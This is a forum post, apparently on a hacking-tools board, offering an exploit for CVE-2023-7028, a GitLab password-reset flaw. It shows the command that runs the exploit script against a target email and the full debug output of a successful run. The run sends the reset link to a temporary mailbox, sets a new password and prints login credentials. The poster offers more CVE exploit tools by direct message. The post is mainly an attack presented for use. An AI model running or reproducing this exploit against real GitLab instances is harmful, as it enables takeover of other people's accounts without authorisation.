CVE-2023-7028

here you'll find all tools you need
Post Reply
User avatar
ghost_sec
Moderator
Posts: 5
Joined: Tue Aug 13, 2024 9:52 pm

CVE-2023-7028

Post by ghost_sec »

##### Method 1: Using temp email
```bash
python3 ./CVE-2023-7028.py -u https://gitlab.example.com/ -t [email protected]

[DEBUG] Getting temporary mail
[DEBUG] Scrapping available domains on 1secmail.com
[DEBUG] 8 domains found
[DEBUG] Temporary mail: [email protected]
[DEBUG] Getting authenticity_token ...
[DEBUG] authenticity_token = bc91lpzwTOaY9dg5SWjLvvDDb61j6ZunCX4DXYlSnWz9Y3zK35SPiLNShhrDrPVDgY_AzQjzpD5qVt2WXeolog
[DEBUG] Sending reset password request
[DEBUG] Emails sended to [email protected] and [email protected] !
[DEBUG] Waiting mail, sleeping for 7.5 seconds
[DEBUG] Getting link using temp-mail | Try N°1 on 5
[DEBUG] Getting last mail for [email protected]
[DEBUG] 1 mail(s) found
[DEBUG] Reading the last one
[DEBUG] Generating new password
[DEBUG] Getting authenticity_token ...
[DEBUG] authenticity_token = RN6gypVz7Zxtu2zRsJmKPsDHNumIH_UPvdn7aQoWRBnUcqmW1hcu8kYcMvI6XbTDsYuZieMFypbe8SWi3q781w
[DEBUG] Changing password to l3mG2v2XN4UBzbN18ZkW
[DEBUG] CVE_2023_7028 succeed !
You can connect on https://gitlab.example.com/users/sign_in
Username: [email protected]
Password: l3mG2v2XN4UBzbN18ZkW
You need to be registered to download the file. Please register or log in to access the attached files.
DM me, for any tools you want!
I have many tools for CVE vulnerabilities using the POC method :)
Post Reply